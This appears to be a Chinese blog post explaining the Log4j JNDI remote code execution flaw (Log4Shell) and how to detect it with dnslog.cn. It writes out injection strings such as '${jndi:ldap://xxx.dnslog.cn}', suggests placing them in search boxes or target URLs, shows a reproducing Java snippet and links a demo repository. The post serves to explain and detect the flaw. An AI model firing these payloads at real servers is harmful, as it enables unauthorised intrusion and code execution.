log4j RCE漏洞原理分析及检测

实现原理

log4j支持使用表达式的形式打印日志,比如

sh 复制代码
logger.info("system propety: ${sys:user.dir}");

问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题

sh 复制代码
logger.info("system propety: ${jndi:schema://url}");

jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。

因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。

那么问题来了,攻击者如何控制服务器上记录的日志内容呢?

非常简单! 大部分web服务程序都会对用户输入进行日志记录。例如:用户访问了哪些url,有哪些关键的输入等,都会被作为参数送到log4j中,我们在这些地方写上 ${jndi:ldap://http://xxx.dnslog.cn} 就可以使web服务从http://xxx.dnslog.cn下载字节流了

12月9日晚,漏洞刚爆出时,在百度、google的搜索框内输入攻击字符串,就可以进行攻击。不提供输入框也好办,在url中随便附上一段也可能成功: www.target.com?${jndi:schema://url}

现在各大网站都已经完成了紧急修复工作,比如在taobao上尝试探测,会被ali的waf阻拦。

漏洞检测

漏洞检测可以使用 http://www.dnslog.cn/ 协助进行。 dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。

漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 会将所有dns解析记录显示在网站上,点击refresh即可看到。

攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。

java 复制代码
private static final Logger LOG = LogManager.getLogger(Application.class);
LOG.info("${jndi:ldap://i3sicw.dnslog.cn}");

如果使用的log4j版本小于2.15就会复现

xml 复制代码
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

一个检测demo

https://gitee.com/ziy001/log4j-attack

运行后会在本机弹出计算器,说明客户端通过这个漏洞让服务端执行了某些代码。

相关推荐
武昌库里写JAVA3 天前
最新6.7分非肿瘤纯生信,使用机器学习筛选慢阻肺中的关键基因。机器学习在非肿瘤生信文章中正火,可重复!
java·开发语言·算法·spring·log4j
卷心菜是俺6 天前
Sping全面复习
java·开发语言·数据库·junit·java-ee·log4j·maven
武昌库里写JAVA6 天前
R语言机器学习与临床预测模型77--机器学习预测常用R语言包
java·开发语言·算法·spring·log4j
脸红ฅฅ*的思春期7 天前
Java安全—log4j日志&FastJson序列化&JNDI注入
java·安全·log4j·fastjson·jndi注入
秋雨雁南飞7 天前
LogViewer NLog, Log4Net, Log4j 文本日志可视化
log4j·nlog·logview
武昌库里写JAVA9 天前
mysql 几种启动和关闭mysql方法介绍
java·开发语言·算法·spring·log4j
枫火木烈王10 天前
log4j异常堆栈文件输出
log4j
@sinner10 天前
【Spring Boot 入门五】Spring Boot中的测试 - 确保应用质量
spring boot·后端·log4j
Jason-河山12 天前
反射API中的`getMethod`和`invoke`反射在测试中的应用?
log4j
蓝染-惣右介12 天前
【日志框架整合】Slf4j、Log4j、Log4j2、Logback配置模板
单元测试·log4j·logback